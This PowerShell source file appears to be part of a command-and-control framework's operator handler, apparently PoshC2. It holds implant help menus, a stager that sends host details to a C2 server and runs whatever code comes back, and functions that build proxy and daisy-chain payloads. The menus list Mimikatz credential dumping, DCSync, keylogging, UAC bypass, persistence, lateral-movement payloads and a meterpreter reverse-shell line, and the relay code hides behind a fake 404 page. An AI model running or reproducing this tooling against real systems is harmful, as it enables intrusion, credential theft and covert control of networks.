$HelpOutput += "ServerPort: $($item.ServerPort) `n"
$HelpOutput += "EncKey: $($item.EncKey) `n"
if ($item.DomainFrontHeader) { $HelpOutput += "DomainFrontHeader: $($item.DomainFrontHeader) `n"}
$HelpOutput += "DefaultSleep: $($item.DefaultSleep) `n"
$HelpOutput += "KillDate: $($item.KillDate) `n"
$HelpOutput += "HTTPResponse: $($item.HTTPResponse) `n"
$HelpOutput += "FolderPath: $($item.FolderPath) `n"
$HelpOutput += "QuickCommand: $($item.QuickCommand) `n"
if ($item.ProxyURL) { $HelpOutput += "ProxyURL: $($item.ProxyURL) `n"}
if ($item.ProxyUser) { $HelpOutput += "ProxyUser: $($item.ProxyUser) `n"}
if ($item.ProxyPass) { $HelpOutput += "ProxyPass: $($item.ProxyPass) `n"}
$HelpOutput += "Sounds: $($item.Sounds) `n"
if ($item.APIKEY) { $HelpOutput += "APIKEY: $($item.APIKEY) `n"}
if ($item.MobileNumber) { $HelpOutput += "MobileNumber: $($item.MobileNumber) `n"}
$HelpOutput += "URLS: $($item.URLS) `n"
$HelpOutput += "SocksURLS: $($item.SocksURLS) `n"
$HelpOutput += "Insecure: $($item.Insecure) `n"
$HelpOutput += "UserAgent: $($item.UserAgent) `n"
if ($item.Referer) { $HelpOutput += "Referer: $($item.Referer) `n"}
$HelpOutput
} elseif ($global:implantid.ToLower().StartsWith("createproxypayload"))
{
$HelpOutput = IEX $global:implantid
$HelpOutput
} elseif ($global:implantid.ToLower().StartsWith("creds"))
{
$HelpOutput = IEX $global:implantid
$HelpOutput
} elseif ($global:implantid.ToLower().StartsWith("listmodules"))
{
Write-Host -Object "Reading modules from `$env:PSModulePath\* and $PoshPath\Modules\*"
$folders = $env:PSModulePath -split ";"
foreach ($item in $folders) {
$PSmod = Get-ChildItem -Path $item -Include *.ps1 -Name
foreach ($mod in $PSmod)
{
$HelpOutput += $mod + "`n"
}
}
$listmodules = Get-ChildItem -Path "$PoshPath\Modules" -Name
foreach ($mod in $listmodules)
{
$HelpOutput += $mod + "`n"
}
$HelpOutput
}
elseif ($global:implantid.Contains(","))
{
$global:cmdlineinput = "PS $global:implantid>"
break
} elseif ($global:implantid -eq "ALL")
{
$global:cmdlineinput = "PS $global:implantid>"
break
} else
{
$global:randomuri = Invoke-SqliteQuery -DataSource $Database -Query "SELECT RandomURI FROM Implants WHERE ImplantID='$global:implantid'" -as SingleValue
$global:cmdlineinput = "PS $global:implantid>"
}
}
}
$tick = "'"
$speechmarks = '"'
function print-mainhelp {
write-host `n "Main Menu: " -ForegroundColor Green
write-host "================================" -ForegroundColor Red
write-host " Use Implant by <id>, e.g. 1"-ForegroundColor Green
write-host " Use Multiple Implants by <id>,<id>,<id>, e.g. 1,2,5"-ForegroundColor Green
write-host " Use ALL Implants by ALL" -ForegroundColor Green
write-host `n "Auto-Runs: " -ForegroundColor Green
write-host "=====================" -ForegroundColor Red
write-host " Add-autorun <task>"-ForegroundColor Green
write-host " List-autorun (Alias: L)"-ForegroundColor Green
write-host " Del-autorun <taskID>"-ForegroundColor Green
write-host " Nuke-autorun"-ForegroundColor Green
write-host " Automigrate-FromPowershell (Alias: AM)"-ForegroundColor Green
write-host `n "Server Commands: " -ForegroundColor Green
write-host "=====================" -ForegroundColor Red
write-host " Show-ServerInfo" -ForegroundColor Green
write-host " History"-ForegroundColor Green
write-host " Output-To-HTML"-ForegroundColor Green
write-host " Set-ClockworkSMSApiKey df2----"-ForegroundColor Green
write-host " Set-ClockworkSMSNumber 44789----"-ForegroundColor Green
write-host " Set-DefaultBeacon 60"-ForegroundColor Green
write-host " ListModules " -ForegroundColor Green
write-host " PwnSelf (Alias: P)" -ForegroundColor Green
write-host " Creds -Action <dump/add/del/search> -Username <username> -password/-hash"-ForegroundColor Green
write-host " CreateNewPayload -hostname https://hostname.com -domainfrontheader <url> " -ForegroundColor Green
write-host " CreateProxyPayload -user <dom\user> -pass <pass> -proxyurl <http://10.0.0.1:8080>" -ForegroundColor Green
}
function print-help($t=0) {
if (($t -eq 1) -or ($t -eq 0)) {
write-host `n "Implant Features: " -ForegroundColor Green
write-host "=====================" -ForegroundColor Red
write-host " Beacon 60s / Beacon 10m / Beacon 2h"-ForegroundColor Green
write-host " Turtle 60s / Turtle 30m / Turtle 8h "-ForegroundColor Green
write-host " Kill-Implant"-ForegroundColor Green
write-host " Hide-Implant"-ForegroundColor Green
write-host " Unhide-Implant"-ForegroundColor Green
write-host " Invoke-Enum"-ForegroundColor Green
write-host " Get-Proxy"-ForegroundColor Green
write-host " Get-ComputerInfo"-ForegroundColor Green
write-host " Unzip <source file> <destination folder>"-ForegroundColor Green
write-host " Get-System" -ForegroundColor Green
write-host " Get-System-WithProxy" -ForegroundColor Green
write-host " Get-System-WithDaisy" -ForegroundColor Green
write-host " Get-ImplantWorkingDirectory"-ForegroundColor Green
write-host " Get-Pid" -ForegroundColor Green
write-host " Posh-Delete C:\Temp\svc.exe" -ForegroundColor Green
write-host " Get-Webpage http://intranet" -ForegroundColor Green
write-host " ListModules " -ForegroundColor Green
write-host " ModulesLoaded " -ForegroundColor Green
write-host " LoadModule <modulename>" -ForegroundColor Green
write-host " LoadModule Inveigh.ps1" -ForegroundColor Green
write-host " Get-UserInfo" -ForegroundColor Green
write-host " Invoke-HostEnum -All" -ForegroundColor Green
write-host " Find-AllVulns" -ForegroundColor Green
write-host " Invoke-Expression (Get-Webclient).DownloadString(`"https://module.ps1`")" -ForegroundColor Green
write-host " StartAnotherImplant or SAI" -ForegroundColor Green
write-host " Invoke-DaisyChain -name dc1daisy -daisyserver http://192.168.1.1 -port 80 -c2port 80 -c2server http://c2.goog.com -domfront aaa.clou.com -proxyurl http://10.0.0.1:8080 -proxyuser dom\test -proxypassword pass -localhost (optional if low level user)" -ForegroundColor Green
write-host " CreateProxyPayload -user <dom\user> -pass <pass> -proxyurl <http://10.0.0.1:8080>" -ForegroundColor Green
write-host " Get-MSHotfixes" -ForegroundColor Green
write-host " Get-FireWallRulesAll | Out-String -Width 200" -ForegroundColor Green
write-host " EnableRDP" -ForegroundColor Green
write-host " DisableRDP" -ForegroundColor Green
write-host " Netsh.exe advfirewall firewall add rule name=`"EnableRDP`" dir=in action=allow protocol=TCP localport=any enable=yes" -ForegroundColor Green
write-host " Get-WLANPass" -ForegroundColor Green
write-host " Get-WmiObject -Class Win32_Product" -ForegroundColor Green
write-host " Get-CreditCardData -Path 'C:\Backup\'" -ForegroundColor Green
write-host " TimeStomp C:\Windows\System32\Service.exe `"01/03/2008 12:12 pm`"" -ForegroundColor Green
write-host " iCacls C:\Windows\System32\ResetPassword.exe /grant Administrator:F" -ForegroundColor Green
write-host " Get-AllFirewallRules C:\temp\rules.csv" -ForegroundColor Green
write-host " Get-AllServices" -ForegroundColor Green
} if (($t -eq 0) -or ($t -eq 2)) {
write-host `n "Privilege Escalation: " -ForegroundColor Green
write-host "====================" -ForegroundColor Red
write-host " Invoke-AllChecks" -ForegroundColor Green
write-host " Invoke-UACBypass" -ForegroundColor Green
write-host " Invoke-UACBypassProxy" -ForegroundColor Green
Write-Host ' Get-MSHotFixes | Where-Object {$_.hotfixid -eq "KB2852386"}' -ForegroundColor Green
write-host " Invoke-MS16-032" -ForegroundColor Green
write-host " Invoke-MS16-032-ProxyPayload" -ForegroundColor Green
write-host " Get-GPPPassword" -ForegroundColor Green
write-host " Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml'" -ForegroundColor Green
write-host " Dir -Recurse | Select-String -pattern 'password='" -ForegroundColor Green
} if (($t -eq 0) -or ($t -eq 3)) {
write-host `n "File Management: " -ForegroundColor Green
write-host "====================" -ForegroundColor Red
write-host " Download-File -Source 'C:\Temp Dir\Run.exe'" -ForegroundColor Green
write-host " Download-Files -Directory 'C:\Temp Dir\'" -ForegroundColor Green
write-host " Upload-File -Source 'C:\Temp\Run.exe' -Destination 'C:\Temp\Test.exe'" -ForegroundColor Green
write-host " Web-Upload-File -From 'http://www.example.com/App.exe' -To 'C:\Temp\App.exe' " -ForegroundColor Green
write-host `n "Persistence: " -ForegroundColor Green
write-host "================" -ForegroundColor Red
write-host " Install-Persistence 1,2,3 " -ForegroundColor Green
write-host " Remove-Persistence 1,2,3" -ForegroundColor Green
write-host " InstallExe-Persistence" -ForegroundColor Green
write-host " RemoveExe-Persistence" -ForegroundColor Green
write-host " Install-ServiceLevel-Persistence | Remove-ServiceLevel-Persistence" -ForegroundColor Green
write-host " Install-ServiceLevel-PersistenceWithProxy | Remove-ServiceLevel-Persistence" -ForegroundColor Green
write-host `n "Network Tasks / Lateral Movement: " -ForegroundColor Green
write-host "==================" -ForegroundColor Red
write-host " Get-ExternalIP" -ForegroundColor Green
write-host " Test-ADCredential -Domain test -User ben -Password Password1" -ForegroundColor Green
write-host " Invoke-SMBLogin -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash/-Password" -ForegroundColor Green
write-host " Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash/-Pass -Command `"net user SMBExec Winter2017 /add`"" -ForegroundColor Green
write-host " Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash/-Pass -Command `"net user SMBExec Winter2017 /add`"" -ForegroundColor Green
write-host " Net View | Net Users | Net localgroup administrators | Net Accounts /dom " -ForegroundColor Green
write-host " Whoami /groups | Whoami /priv " -ForegroundColor Green
} if (($t -eq 0) -or ($t -eq 4)) {
write-host `n "Active Directory Enumeration: " -ForegroundColor Green
write-host "==================" -ForegroundColor Red
write-host " Invoke-ACLScanner" -ForegroundColor Green
write-host " Get-ObjectACL -ResolveGUIDs -SamAccountName john" -ForegroundColor Green
write-host " Add-ObjectACL -TargetSamAccountName arobbins -PrincipalSamAccountName harmj0y -Rights ResetPassword" -ForegroundColor Green
write-host " Get-Netuser -admincount | select samaccountname" -ForegroundColor Green
write-host " Get-DomainUser -UACFilter NOT_PASSWORD_EXPIRED,NOT_ACCOUNTDISABLE -Properties samaccountname,pwdlastset | Export-Csv act.csv" -ForegroundColor Green
write-host " Get-Netgroup -admincount | select samaccountname" -ForegroundColor Green
write-host " Get-NetGroupMember `"Domain Admins`" -recurse|select membername" -ForegroundColor Green
write-host ' Get-NetComputer | Select-String -pattern "Citrix" ' -ForegroundColor Green
write-host ' Get-NetComputer -filter operatingsystem=*7*|select name' -ForegroundColor Green
write-host ' Get-NetComputer -filter operatingsystem=*2008*|select name' -ForegroundColor Green
write-host " Get-DomainComputer -LDAPFilter `"(|(operatingsystem=*7*)(operatingsystem=*2008*))`" -SPN `"wsman*`" -Properties dnshostname,serviceprincipalname,operatingsystem,distinguishedname | fl" -ForegroundColor Green
write-host ' Get-NetGroup | Select-String -pattern "Internet" ' -ForegroundColor Green
write-host ' Get-NetUser -Filter | Select-Object samaccountname,userprincipalname' -ForegroundColor Green
write-host ' Get-NetUser -Filter samaccountname=test' -ForegroundColor Green
write-host ' Get-NetUser -Filter userprinciplename=test@test.com' -ForegroundColor Green
write-host ' Get-NetGroup | select samaccountname' -ForegroundColor Green
write-host ' Get-NetGroup "*BEN*" | select samaccountname ' -ForegroundColor Green
write-host ' Get-NetGroupMember "Domain Admins" -recurse|select membername' -ForegroundColor Green
write-host ' Get-NetShare Hostname' -ForegroundColor Green
write-host " Invoke-ShareFinder -Verbose -CheckShareAccess" -ForegroundColor Green
write-host " New-PSDrive -Name `"P`" -PSProvider `"FileSystem`" -Root `"\\bloredc1\netlogon`"" -ForegroundColor Green
write-host `n "Domain Trusts: " -ForegroundColor Green
write-host "==================" -ForegroundColor Red
write-host " Get-NetDomain | Get-NetDomainController | Get-NetForestDomain" -ForegroundColor Green
write-host " Invoke-MapDomainTrust" -ForegroundColor Green
write-host ' Get-NetUser -domain child.parent.com -Filter samaccountname=test' -ForegroundColor Green
write-host ' Get-NetGroup -domain child.parent.com | select samaccountname' -ForegroundColor Green
} if (($t -eq 0) -or ($t -eq 5)) {
write-host `n "Domain / Network Tasks: " -ForegroundColor Green
write-host "==================" -ForegroundColor Red
write-host " Invoke-BloodHound -CollectionMethod 'Stealth' -CSVFolder C:\temp\" -ForegroundColor Green
write-host " Get-NetDomainController | Select name | get-netsession | select *username,*CName" -ForegroundColor Green
write-host " Get-DFSshare | get-netsession | Select *username,*CName" -ForegroundColor Green
write-host " Get-NetFileServer | get-netsession | Select *username,*CName" -ForegroundColor Green
write-host " Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash" -ForegroundColor Green
write-host " Write-SCFFile -IPaddress 127.0.0.1 -Location \\localhost\c$\temp\" -ForegroundColor Green
write-host " Write-INIFile -IPaddress 127.0.0.1 -Location \\localhost\c$\temp\" -ForegroundColor Green
write-host ' Get-NetGroup | Select-String -pattern "Internet" ' -ForegroundColor Green
write-host " Invoke-Hostscan -IPRangeCIDR 172.16.0.0/24 (Provides list of hosts with 445 open)" -ForegroundColor Green
write-host " Get-NetFileServer -Domain testdomain.com" -ForegroundColor Green
write-host " Find-InterestingFile -Path \\SERVER\Share -OfficeDocs -LastAccessTime (Get-Date).AddDays(-7)" -ForegroundColor Green
write-host " Brute-AD" -ForegroundColor Green
write-host " Brute-LocAdmin -Username administrator" -ForegroundColor Green
Write-Host " Get-PassPol" -ForegroundColor Green
Write-Host " Get-PassNotExp" -ForegroundColor Green
Write-Host " Get-LocAdm" -ForegroundColor Green
Write-Host " Invoke-Inveigh -HTTP Y -Proxy Y -NBNS Y -Tool 1" -ForegroundColor Green
Write-Host " Get-Inveigh | Stop-Inveigh (Gets Output from Inveigh Thread)" -ForegroundColor Green
Write-Host " Invoke-Sniffer -OutputFile C:\Temp\Output.txt -MaxSize 50MB -LocalIP 10.10.10.10" -ForegroundColor Green
Write-Host " Invoke-SqlQuery -sqlServer 10.0.0.1 -User sa -Pass sa -Query 'SELECT @@VERSION'" -ForegroundColor Green
Write-Host " Invoke-Runas -User <user> -Password '<pass>' -Domain <dom> -Command C:\Windows\System32\cmd.exe -Args `" /c calc.exe`"" -ForegroundColor Green
Write-Host " Invoke-Pipekat -Target <ip-optional> -Domain <dom> -Username <user> -Password '<pass>' -Hash <hash-optional>" -ForegroundColor Green
write-host " Invoke-WMIExec -Target <ip> -Domain <dom> -Username <user> -Password '<pass>' -Hash <hash-optional> -command <cmd>" -ForegroundColor Green
} if (($t -eq 0) -or ($t -eq 6)) {
write-host `n "Lateral Movement: " -ForegroundColor Green
write-host "=========================================================" -ForegroundColor Red
Write-Host " Invoke-RunasPayload -User <user> -Password '<pass>' -Domain <dom>" -ForegroundColor Green
Write-Host " Invoke-RunasProxyPayload -User <user> -Password '<pass>' -Domain <dom>" -ForegroundColor Green
Write-Host " Invoke-RunasDaisyPayload -User <user> -Password '<pass>' -Domain <dom>" -ForegroundColor Green
write-host " Invoke-DCOMPayload -Target <ip>" -ForegroundColor Green
write-host " Invoke-DCOMProxyPayload -Target <ip>" -ForegroundColor Green
write-host " Invoke-DCOMDaisyPayload -Target <ip>" -ForegroundColor Green
write-host " Invoke-PsExecPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green
write-host " Invoke-PsExecProxyPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green
write-host " Invoke-PsExecDaisyPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green
write-host " Invoke-WMIPayload -Target <ip> -Domain <dom> -Username <user> -Password '<pass>' -Hash <hash-optional>" -ForegroundColor Green
write-host " Invoke-WMIProxyPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green
write-host " Invoke-WMIDaisyPayload -Target <ip> -Domain <dom> -user <user> -pass '<pass>'" -ForegroundColor Green
write-host " Invoke-WinRMSession -IPAddress <ip> -user <dom\user> -pass <pass>" -ForegroundColor Green
} if (($t -eq 0) -or ($t -eq 7)) {
write-host `n "Credentials / Tokens / Local Hashes (Must be SYSTEM): " -ForegroundColor Green
write-host "=========================================================" -ForegroundColor Red
write-host " Invoke-Mimikatz | Out-String | Parse-Mimikatz" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)sekurlsa::logonpasswords$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::sam$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::lsa$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::cache$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)ts::multirdp$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)privilege::debug$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)crypto::capi$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)crypto::certificates /export$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<HASH> /run:c:\temp\run.bat$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-Mimikatz -Computer 10.0.0.1 -Command $($tick)$($speechmarks)sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<HASH> /run:c:\temp\run.bat$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-TokenManipulation | Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String" -ForegroundColor Green
write-host ' Invoke-TokenManipulation -ImpersonateUser -Username "Domain\User"' -ForegroundColor Green
write-host `n "Credentials / Domain Controller Hashes: " -ForegroundColor Green
write-host "============================================" -ForegroundColor Red
write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::dcsync /domain:domain.local /user:administrator$($speechmarks)$($tick)" -ForegroundColor Green
write-host " Invoke-DCSync -PWDumpFormat" -ForegroundColor Green
write-host " Dump-NTDS -EmptyFolder <emptyfolderpath>" -ForegroundColor Green
} if (($t -eq 0) -or ($t -eq 8)) {
write-host `n "Useful Modules: " -ForegroundColor Green
write-host "====================" -ForegroundColor Red
write-host " Get-Screenshot" -ForegroundColor Green
write-host " Get-ScreenshotAllWindows" -ForegroundColor Green
write-host " Get-ScreenshotMulti -Timedelay 120 -Quantity 30" -ForegroundColor Green
write-host " Get-RecentFiles" -ForegroundColor Green
write-host " Cred-Popper" -ForegroundColor Green
write-host " Get-Clipboard" -ForegroundColor Green
write-host " Hashdump" -ForegroundColor Green
write-host ' Get-Keystrokes' -ForegroundColor Green
write-host " ArpScan -IPCidr 10.0.0.1/24" -ForegroundColor Green
write-host " PortScan -IPaddress 10.0.0.1-50 -Ports `"1-65535`" -maxQueriesPS 10000 -delay 0" -ForegroundColor Green
write-host " Invoke-UserHunter -StopOnSuccess" -ForegroundColor Green
write-host " Migrate" -ForegroundColor Green
write-host " Migrate -x64 -ProcID 444" -ForegroundColor Green
write-host " Migrate -x64 -ProcessPath C:\Windows\System32\cmd.exe" -ForegroundColor Green
write-host " Migrate -x86" -ForegroundColor Green
write-host " Migrate-x64 -ProcID 4444" -ForegroundColor Green
write-host " Migrate-x64 -ProcessPath C:\Windows\System32\cmd.exe" -ForegroundColor Green
write-host " Migrate-x86 -ProcessPath C:\Windows\System32\cmd.exe" -ForegroundColor Green
write-host " Migrate-Proxy-x86 -ProcID 4444" -ForegroundColor Green
write-host " Migrate-Proxy-x64 -ProcID 444" -ForegroundColor Green
write-host " Migrate-Daisy-x86 -Name DC1 -ProcID 444" -ForegroundColor Green
write-host " Migrate-Daisy-x64 -Name DC2" -ForegroundColor Green
write-host " Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 5634" -ForegroundColor Green
write-host " Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.16.0.100 -Lport 443 -Force" -ForegroundColor Green
write-host ' Get-Eventlog -newest 10000 -instanceid 4624 -logname security | select message -ExpandProperty message | select-string -pattern "user1|user2|user3"' -ForegroundColor Green
write-host ' Send-MailMessage -to "itdept@test.com" -from "User01 <user01@example.com>" -subject <> -smtpServer <> -Attachment <>'-ForegroundColor Green
write-host ' SharpSocks -Uri http://www.c2.com:9090 -Beacon 2000 -Insecure' -ForegroundColor Green
write-host `n "Implant Handler: " -ForegroundColor Green
write-host "=====================" -ForegroundColor Red
write-host " Back" -ForegroundColor Green
write-host " Exit" `n -ForegroundColor Green
}
}
$command = '[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
function Get-Webclient ($Cookie) {
$d = (Get-Date -Format "dd/MM/yyyy");
$d = [datetime]::ParseExact($d,"dd/MM/yyyy",$null);
$k = [datetime]::ParseExact("'+$killdatefm+'","dd/MM/yyyy",$null);
if ($k -lt $d) {exit}
$wc = New-Object System.Net.WebClient;
$wc.UseDefaultCredentials = $true;
$wc.Proxy.Credentials = $wc.Credentials;
$h="'+$domainfrontheader+'"
if ($h) {$wc.Headers.Add("Host",$h)}
$wc.Headers.Add("User-Agent","'+$useragent+'")
if ($cookie) {
$wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie")
} $wc }
function primer {
if ($env:username -eq $env:computername+"$"){$u="SYSTEM"}else{$u=$env:username}
$pre = [System.Text.Encoding]::Unicode.GetBytes("$env:userdomain\$u;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid")
$p64 = [Convert]::ToBase64String($pre)
$pm = (Get-Webclient -Cookie $p64).downloadstring("'+$ipv4address+":"+$serverport+'/connect")
$pm = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pm))
$pm }
$pm = primer
if ($pm) {$pm| iex} else {
start-sleep 10
primer | iex }'
function Get-RandomURI
{
param (
[int]$Length
)
$set = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
$result = ''
for ($x = 0; $x -lt $Length; $x++)
{
$result += $set | Get-Random
}
return $result
}
function Create-AesManagedObject
{
param
(
[Object]
$key,
[Object]
$IV
)
$aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV)
{
if ($IV.getType().Name -eq 'String')
{$aesManaged.IV = [System.Convert]::FromBase64String($IV)}
else
{$aesManaged.IV = $IV}
}
if ($key)
{
if ($key.getType().Name -eq 'String')
{$aesManaged.Key = [System.Convert]::FromBase64String($key)}
else
{$aesManaged.Key = $key}
}
$aesManaged
}
function Create-AesKey()
{
$aesManaged = Create-AesManagedObject
$aesManaged.GenerateKey()
[System.Convert]::ToBase64String($aesManaged.Key)
}
function PatchDll {
param($dllBytes, $replaceString, $Arch, $offset)
if ($Arch -eq 'x86') {
$dllOffset = 0x00012F80
}
if ($Arch -eq 'x64') {
$dllOffset = 0x00017300
}
if($offset) {
$dllOffset = $offset
}
$replaceStringBytes = ([System.Text.Encoding]::UNICODE).GetBytes($replaceString)
$dllLength = $replaceString.Length
$patchLength = 8000 -$dllLength
$nullString = 0x00*$patchLength
$nullBytes = ([System.Text.Encoding]::UNICODE).GetBytes($nullString)
$nullBytes = $nullBytes[1..$patchLength]
$replaceNewStringBytes = ($replaceStringBytes+$nullBytes)
$dllLength = 16000 -2
$i=0
$dllOffset..($dllOffset + $dllLength) | % {
$dllBytes[$_] = $replaceNewStringBytes[$i]
$i++
}
return $DllBytes
}
function CreateNewPayload
{
param
(
[Parameter(Mandatory=$true)][AllowEmptyString()][string]$hostname,
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$domainfrontheader
)
if ($Insecure -eq "Yes") {
$command = createdropper -enckey $enckey -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $hostname -serverport $serverport -Insecure -useragent $useragent -Referer $Referer
} else {
$command = createdropper -enckey $enckey -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $hostname -serverport $serverport -useragent $useragent -Referer $Referer
}
$dom = $hostname -replace "https://",""
$dom = $dom -replace "http://",""
$payload = createrawpayload -command $command
CreatePayload -Domain $dom
CreateStandAloneExe -Domain $dom
CreateDLL -Domain $dom
}
function CreateProxyPayload
{
param
(
[Parameter(Mandatory=$true)][AllowEmptyString()][string]$username,
[Parameter(Mandatory=$true)][AllowEmptyString()][string]$password,
[Parameter(Mandatory=$true)][string]$proxyurl
)
if ($Insecure -eq "Yes") {
$command = createdropper -enckey $enckey -Proxy -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $ipv4address -serverport $serverport -username $username -password $password -proxyurl $proxyurl -Insecure -useragent $useragent -Referer $Referer
} else {
$command = createdropper -enckey $enckey -Proxy -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $ipv4address -serverport $serverport -username $username -password $password -proxyurl $proxyurl -useragent $useragent -Referer $Referer
}
$payload = createrawpayload -command $command
CreatePayload -Proxy 1
CreateStandAloneExe -Proxy 1
CreateServiceExe -Proxy 1
CreateDLL -Proxy 1
}
function Invoke-DaisyChain {
param(
[Parameter(Mandatory=$true)][string]$name,
[Parameter(Mandatory=$true)][string]$port,
[Parameter(Mandatory=$true)][string]$daisyserver,
[Parameter(Mandatory=$true)][string]$c2server,
[Parameter(Mandatory=$true)][string]$c2port,
[Parameter(Mandatory=$false)][switch]$Localhost,
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$domfront,
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxyurl,
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxyuser,
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxypassword)
$firewallName = Get-RandomURI -Length 15
$fw = Read-Host "Do you want to create a firewall rule for this: Y/N"
if ($fw -eq "Y") {
$fwcmd = "Netsh.exe advfirewall firewall add rule name=`"$firewallName`" dir=in action=allow protocol=TCP localport=$port enable=yes"
}
if ($Localhost.IsPresent){
$HTTPServer = "localhost"
$daisyserver = "http://localhost"
} else {
$HTTPServer = "+"
}
$command = createdropper -enckey $enckey -Daisy -killdate $killdatefm -ipv4address $daisyserver -serverport $port -Referer $Referer
$payload = createrawpayload -command $command
CreatePayload -DaisyName $name
CreateStandAloneExe -DaisyName $name
CreateServiceExe -DaisyName $name
CreateDLL -DaisyName $name
[IO.File]::WriteAllLines("$FolderPath\payloads\$($name).bat", $payload)
Write-Host -Object "Payload written to: $FolderPath\payloads\$($name).bat" -ForegroundColor Green
$fdsf = @"
`$username = "$proxyuser"
`$password = "$proxypassword"
`$proxyurl = "$proxyurl"
`$domainfrontheader = "$domfront"
`$serverport = '$port'
`$Server = "${c2server}:${c2port}"
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}
function Get-Webclient (`$Cookie) {
`$d = (Get-Date -Format "dd/MM/yyyy");
`$d = [datetime]::ParseExact(`$d,"dd/MM/yyyy",`$null);
`$k = [datetime]::ParseExact("$killdatefm","dd/MM/yyyy",`$null);
if (`$k -lt `$d) {exit}
`$username = `$username
`$password = `$password
`$proxyurl = `$proxyurl
`$wc = New-Object System.Net.WebClient;
`$wc.Headers.Add("User-Agent","$useragent")
`$wc.Headers.Add("Referer","$referer")
`$h=`$domainfrontheader
if (`$h) {`$wc.Headers.Add("Host",`$h)}
if (`$proxyurl) {
`$wp = New-Object System.Net.WebProxy(`$proxyurl,`$true);
`$wc.Proxy = `$wp;
}
if (`$username -and `$password) {
`$PSS = ConvertTo-SecureString `$password -AsPlainText -Force;
`$getcreds = new-object system.management.automation.PSCredential `$username,`$PSS;
`$wp.Credentials = `$getcreds;
} else {
`$wc.UseDefaultCredentials = `$true;
}
if (`$cookie) {
`$wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=`$Cookie")
}
`$wc
}
`$httpresponse = '
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL/s was not found on this server.</p>
<hr>
<address>Apache (Debian) Server</address>
</body></html>
'
`$URLS = $($URLS),$($SocksURLS)
`$listener = New-Object -TypeName System.Net.HttpListener
`$listener.Prefixes.Add("http://$($HTTPServer):`$serverport/")
`$listener.Start()
echo "started http server"
while (`$listener.IsListening)
{
if (`$kill.log -eq 2) {`$listener.Stop();exit}
`$message = `$null
`$context = `$listener.GetContext()
`$request = `$context.Request
`$response = `$context.Response
`$url = `$request.RawUrl
`$method = `$request.HttpMethod
if (`$null -ne (`$URLS | ? { `$url -match `$_ }) ) {
`$cookiesin = `$request.Cookies -replace 'SessionID=', ''
`$responseStream = `$request.InputStream
`$targetStream = New-Object -TypeName System.IO.MemoryStream
`$buffer = new-object byte[] 10KB
`$count = `$responseStream.Read(`$buffer,0,`$buffer.length)
`$downloadedBytes = `$count
while (`$count -gt 0)
{
`$targetStream.Write(`$buffer, 0, `$count)
`$count = `$responseStream.Read(`$buffer,0,`$buffer.length)
`$downloadedBytes = `$downloadedBytes + `$count
}
`$len = `$targetStream.length
`$size = `$len + 1
`$size2 = `$len -1
`$buffer = New-Object byte[] `$size
`$targetStream.Position = 0
`$targetStream.Read(`$buffer, 0, `$targetStream.Length)|Out-null
`$buffer = `$buffer[0..`$size2]
`$targetStream.Flush()
`$targetStream.Close()
`$targetStream.Dispose()
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}
